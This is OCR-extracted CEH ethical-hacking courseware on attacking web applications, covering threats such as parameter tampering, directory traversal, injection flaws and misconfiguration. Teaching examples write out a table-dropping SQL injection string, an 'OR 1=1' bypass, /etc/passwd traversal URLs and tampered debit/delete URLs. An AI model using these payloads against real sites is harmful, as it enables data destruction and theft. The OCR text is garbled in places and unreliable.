Escolar Documentos
Profissional Documentos
Cultura Documentos
Module 13
CEH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security News
CEH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517. Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat. "Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers, don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage." The Superfecta attack traffic for Q3 2012 can be broken down as follows: As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (llm illion / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic. Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last: During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Transversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present it to its security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule O bjectives
J J J J J J J J J How Web Applications Work Web Attack Vectors Web Application Threats Web App Hacking Methodology Footprint Web Infrastructure Hacking WebServers Analyze Web Applications Attack Authentication Mechanism Attack Authorization Schemes 1/ ^ J J J J J J J J J Session Management Attack Attack Data Connectivity Attack Web App Client Attack Web Services Web Application Hacking Tools Countermeasures Web Application Security Tools Web Application Firewall Web Application Pen Testing
CEH
M o d u le O b je c tiv e s
The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of the web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrator to monitor and manage the web application are described. Finally web application pen testing is discussed. This module familiarizes you with:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S S s S S s s S
Session Management Attack Attack Data Connectivity Attack Web App Client Attack Web Services Web Application Hacking Tools Countermeasures Web Application Security Tools Web Application Firewall Web Application Pen Testing
Web Application Threats Web App Hacking Methodology Footprint Web Infrastructure
A A
Hacking Webservers Analyze Web Applications Attack Authentication Mechanism Attack Authorization Schemes
Ethical Hacking and Countermeasures Copyright by ECC0UI1Cil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
Web applications are the application programs accessed only with Internet connection enabled. These applications use HTTP as their primary communication protocol. Generally, the attackers target these apps for several reasons. They are exposed to various attacks. For clear understanding of the "hacking web applications" we divided the concept into various sections. Web App Concepts Web App Threats Hacking Methodology Web Application Hacking Tools Countermeasures Security Tools Web App Pen Testing Let us begin with the Web App concepts.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
^^
Security Tools
Countermeasures
Hacking Methodology
This section introduces you to the web application and its components, explains how the web application works, and its architecture. It provides insight into web 2.0 application, vulnerability stacks, and web attack vectors.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Cross-Site Scripting Information Leakage
m ~
According to the WHITEHAT security website statistics report in 2012, it is clear that the crosssite scripting vulnerabilities are found on more web applications when compared to other vulnerabilities. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities are the most common vulnerabilities found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in the web applications, you have to adopt necessary countermeasures against them.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
W O
a > 4 Q
I H
Content Spoofing Insufficient Authorization L Cross-Site Request Forgery Brute Force Predictable Resource Location SQL Injection 10% Session Fixation Insufficient Session Expiration
o
0
C 16%
a.
a
1
10
20
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
* ,
Web applicationsand Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
New web technologies such as Web 2.0 provide more attack surface for web application exploitation
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites. However, cookies are not perfect from a security point of view because they can be copied and stored on the client's local hard disk, so that users do not have to request a token for each query. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers use different types of vulnerabilities that can be discovered in web applications and exploit them to compromise web applications. Attackers also use tools to launch attacks on web applications.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
U rtifw d itfcM jl N M h M
C EH
1
IS
W e b A p p lic a tio n C o m p o n en ts
The components of web applications are listed as follows
Login: Most of the websites allow authentic users to access the application by means of login. It means that to access the service or content offered by the web application user needs to submit his/her username and password. Example gmail.com The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server. Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information. User Permissions: When you are not allowed to access the specified web page in which you are logged in with user permissions, you may redirect again to the login page or to any other page. The Application Content: It is an interactive program that accepts web requests by clients and uses the parameters that are sent by the web browser for carrying out certain functions. Data Access: Usually the web pages will be contacting with each other via a data access library in which all the database details are stored.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
The Data Store: It is a way to the important data that is shared and synchronized between the children/threats. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network. They can be in contact or accessible with each other through the network connection. Role-level System Security Application Logic: Usually web applications are divided into tiers of which the application logic is the middle tier. It receives the request from the web browser and gives it services accordingly. The services offered by the application logic include asking questions and giving the latest updates against the database as well as generating a user interface. Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either by taking the initiative by the application logic or by automatically ending when the servlet session times out.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
ID 6329
Topic Tech
News
SELECT * from news where id = 6329
CNN
O u tp u t
H o w W e b A p p lic a tio n s W o rk
Whenever someone clicks or types in the browser, immediately the requested website or content is displayed on the screen of the computer, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website where multiple computers are involved. The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information. Let's see how the user triggers the initial request through the browser to the web application server: First the user types the website name or URL in the browser and the request is sent to the web server. On receiving the request ,the web server checks the file extension: If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server. The user's request is now processed by the web application server. In order to process the user's request, the web server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored on the database. Once done processing the request, web application server sends the results to the web server, which in turn sends the results to the user's browser.
User
Login Form
Internet
Firewall
Web Server
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Clients
Web Services
Business Layer
Application Server
J2EE XCode
.NET C++
COM COM+
Business Logic
Presentation Layer
Firewall HTTP Request Parser
Servlet Container
Resource Handler
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Clients
,
Business Layer
W eb Browser
Presentation
US
S m a rt P h o n e s , W e b A p p lia n c e
-v
Application Server
___
J2EE XCode .NET C + COM COM Business logic
P E x te rn ! W e b S e rv ic e !
Web Server
Prssantation Layer
F ire w a ll H T T PR e q u e s tP a rs e r S e rv le t C o n ta in e r R e s o u rc e H a n d le r
Database Layer
Cloud Services
A u th e n tic a tio n a n dL o g in
Database Server
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Crt1fW 4
CEH
itfciul NM kM
Web 2.0 refers to a new generation of Web applications that provide an infrastructure for more dynamic user participation, social interaction and collaboration
RSS-generated syndication
O'
'
Q f
O O
Q
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Flash-rich interface websites Mobile application (iPhone) Q New technologies like AJAX (Gmail, YouTube)
Blogs (Wordpress)
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
V ulnerability Stack
Custom Web Applications
CEH
Business Logic Flaws Technical Vulnerabilities Open Source / Commercial
B El
_
_
E
f^ wr
Database
Web Server
Operating System
Windows / Linux
/OSX
Router / Switch
Network
Security
IPS / IDS
V u ln e r a b ility S ta ck
The web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one or the other way to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major sources of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable:
i f -
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security
IPS /IDS
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack
W e b A tta c k V e cto rs
An attack vector is a method of entering into to unauthorized systems to performing malicious attacks. Once the attacker gains access into the system or the network he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors: Parameter manipulation: Providing the wrong input value to the web services by the attacker and gaining the control over the SQL, LDAP, XPATH, and shell commands. When the incorrect values are provided to the web services, then they become vulnerable and are easily attacked by web applications running with web services. 0 XML poisoning: Attackers provide manipulated XML documents that when executed can disturb the logic of parsing method on the server. When huge XMLs are executed at the application layer, then they can be easily be compromised by the attacker to launch his or her attack and gather information.
Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to handle SQL injection, LDAP injection, etc. and negotiate the web application's key resources.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Server Misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers. Web service routing issues: The SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. The exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints. Cross-site scripting: Whenever any infected JavaScript code is executed, then the targeted browsers can be exploited to gather information by the attacker.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
Web applications are targeted by attackers for various reasons. The first issue is quality of the source code as related to security is poor and another issue is an application with "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.
m
Jk
Security Tools
Countermeasures
B#
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
(lllfwtf ttfciul NM hM
Storage
C ookie P o iso n in g
By changing the information inside the cookie, attackers bypass the authentication process and once they gain control over the network, they can either modify the content, use the system for the malicious attack, or steal information from the user's system.
D irecto ry T ra v e rsa l
Attackers exploit HTTP by using directory traversal and they will be able to access restricted directories; they execute commands outside of the web server's root directory.
U n v alid ated In p u t
In order to bypass the security system, attackers tamper with the http requests, URL, headers, form fields, hidden fields, query strings etc. Users' login IDs and other related
Module 13 Page 1750 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
data gets stored in the cookies and this becomes a source of attack for the intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.
In je c tio n F law s
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
SQL In je c tio n
This is a type of attack where SQL commands are injected by the attacker via input data; then the attacker can tamper with the data.
This type of tampering attack is intended to manipulating the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. Man in the middle is one of the examples for this type of attack. Attackers use tools like Web scarab and Paros proxy for these attacks. M ||M ' ' t __ i__ A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.
P a ra m e te r/F o rm T a m p e rin g
The cross-site request forgery method is a kind of attack where an authenticated user in made to perform certain tasks on the web application that an attackers chooses. For example, a user clicking on a particular link sent through an email or chat.
In fo rm atio n L e a k a g e
Information leakage can cause great losses for a company. Hence, all sources such as
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Im p ro p e r E rror H an d lin g
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.
Log T a m p e rin g
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.
Buffer O verflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.
B roken Session M a n a g e m e n t
When security-sensitive credentials such as passwords and other useful material are not properly taken care, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.
B roken A ccount M a n a g e m e n t
----- Even authentication schemes that are valid are weakened because of vulnerable account management functions including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.
In s e c u re S torage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere; possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allow the attacker to gain access to the web application as a legitimate user.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
V
v 1
Authentication Hijacking
&
Malicious File Execution
When various internal implementation objects such as file, directory, database record, or key are exposed through a reference by a developer, then the insecure direct object reference takes place. For example, where a bank account number is made a primary key, then there is a good change it can be compromised by the attacker based on such references.
in
In s e c u re D ire c t O b je c t R e fe re n c e s
In s e c u re C ry p to g ra p h ic Sto rag e
When sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken to store the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A u th en ticatio n H ijack in g
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.
C ookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers or may use this information to launch various attacks on the victim's web applications. =
W eb S ervices A ttacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.
-^
SSL/TLS authentications should be used for authentication on websites or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and admin accounts may happen after systems are being compromised. I
H idden M an ip u latio n
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.
Access
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
O b fu scatio n A p p lication
Attackers usually work hard at hiding their attacks and to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of wellknown attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.
S ecurity M a n a g e m e n t E xploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
U nvalidated In p u t
Input validation flaws refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers
CEH
An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning
Boy.com
Database
http://juggyboy.com/login.aspx ?user=jasons0pass=sprxngfield
Browser Post Request
s trin g sql ,,s e le c t * from Users where user = " + User. Text + and pwd= + Password.Text + ! r Modified Query
U n v a lid a te d In p u t
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the the purpose of encoding. Many http inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications use only a client-side mechanism in input validation and attackers can easily bypass it. In order to bypass the security system, attackers tamper the http requests, URLs, headers, form fields, hidden fields, and query strings. Users login IDs and other related data gets stored in the cookies and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation that result in data theft and system malfunctioning.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Database
http://juggyboy.com/login.aspx ?user=jasons@pass=springfield
Browser Post Request
Wtmmrnmr*
s t r in g sq l ,,s e le c t * from Users where user = ' + User.Text + ' and pwd=1 + Password.Text + " ' " r M odified Query
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
U rt1 fw 4 ilhiul lU th M
CEH
______ . - - .
0 (D |
http://www.juggybank.com/cust.asp?profile=21&debit=2500 <......J 0 @ 1
http://www.juggybank.com/stat.asp?pg=531&status=view
< ........
0
| http://www.juggybank.com/stat.asp?pg-147&status delete <
P a ra m e te r/ F o rm T a m p e rin g
Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in an URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters. Detailed Description Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value, and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser. r-
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Hidden fields that are invisible to the end user provide information status to the web application. For example, consider a product order form that includes the hidden field as follows: <input type="hidden" name="price" value="99. 90"> Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows: <FORM METHOD=POST ACTION="xferMoney. asp> Source Account: <SELECT NAME="SrcAcc"> <OPTION VALUE=" 123456789">******789</OPTION> <OPTION VALUE="868686868">******868</OPTIONX/SELECT> <BR>Amount: <INPUT NAME="Amount" SIZE=20> <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40> <BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET> </FORM> Bypassing An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account. HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the URL is requested as follows: http://www.iuggvbank.com/cust.asp?profile=21&debit=2500 An attacker may change the URL parameters (profile and debit) in order to debit another account: http://www.iuggybank.com/cust.asp?profile=82&debit=1500 There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link: http://www.iuggybank.com/stat.asp?pg=531&status=view
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
An attacker can modify the status parameter to delete in order to delete permission for the content. http://www.iuggybank.com/stat.asp?pg=147&status=delete Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users as well as parameters allowing access to developer and debugging information.
[G O
h t t p : / / w w w . j u g g y b a n k . c o m / c u s t . a s p ? p r o f i l e = 2 1 & d e b i t = 2 5 0 0
h t t p : / / w w w . j u g g y b a n k . c o m / c u s t .a s p? p r o f i l e = 8 2 & d e b i t = 1 5 0 0
|G O |Q O
http://www.juggybank.com/stat. asp?pg=531&status=view
http://www.juggybank.com/stat.asp?pg=147&status=delete
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
itkiul Nm Im
D ire c to ry T ra v e r s a l
___ When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A Directory Traversal/Forceful Browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can: Enumerate the contents of files and directories Access pages that otherwise require authentication (and possibly payment) Gain secret knowledge of the application and its construction Discover user IDs and passwords buried in hidden files Locate source code and other interesting files left on the server View sensitive data, such as customer information
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
http://www.targetsite.com/../../../sitebackup.zip This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information: http://www.targetsite.com/../../../../etc/passwd Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal: http://www.iuggybov.com/process.aspx=.J . / s o m e dir/some file http://www.iuggyboy.com/.././../../some dir/some file The pictorial representation of directory traversal attack is shown as follows:
/../../ /e tc /p a s s w d < ? p hp
$ th em e ' J a o o n . p h p ' ,
> c
password files
1 *
) )
Attacker
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Security M isconfiguration
E as y E x p lo ita tio n
CEH
Using misconfiguration vulnerabilities, attackers gain unauthorized accesses to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.
C om m on P re v a le n c e
Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code
E x a m p le
The application server admin console is automatically installed and not removed Default accounts are not changed Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over
_ " Developers and network administrators should check that the entire stack is ' ___ configured properly or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, then it results in various problems that can infect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of and it proves very beneficial if they are completely disabled so that the outsiders don't make use of them for malicious attacks. All the application-based files have to be taken care of through proper authentication and strong security methods or crucial information can be leaked to the attackers. Examples of unnecessary features that should be disable or changed include: Q The application server admin console is automatically installed and not removed Default accounts are not changed
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
In jectio n Flaw s
CEH
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers
S Q L In je c tio n
It involves the injection of malicious SQL queries into user input forms
C o m m a n d In je c tio n
It involves the injection of malicious code through a web application
L D A P In je c tio n
It involves the injection of malicious LDAP statements
SQL Server
In je c tio n F la w s
Injection flaws are the loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. The injection flaws are being exploited by the attacker by constructing malicious commands or queries that result in loss of data or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, i.e., relevant or irrelevant to that particular application. They are many types of injection flaws; some of them are as follows:
SQL injection
SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this, the attacker injects the malicious SQL queries into the user input form and this is usually performed to either to gain unauthorized access to a database or to retrieve information directly from the database.
* Command injection
The flaws in command injection are another type of web application vulnerability.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
These flaws are highly dangerous. In this type of attack, the attacker injects the malicious code via a web application.
LADP in jectio n
LDAP injection is an attack method in which the website that constructs the LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, then the LDAP statement can be modified with the help of local proxy. This in turn results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
SQ L in je c tio n a tta c k s
An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches
Web Browser
...................
Internet
test');DROP TABLE Messages;-When this code is sent to the database server, it drops the Messages table
01 02 03 04 05 06 07 08 09 10 11
<?php function save email($user, $message) { $sql = "INSERT INTO Messages ( user, message ) VALUES ( '$user1, '$message' ) return mysql_query($sql); } ?>
SC*L Injection vulnerable server code
where
SELECT * FROM tablename WHERE UserID= 2302 OR 1=1 The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to: Log in to the application without supplying valid credentials
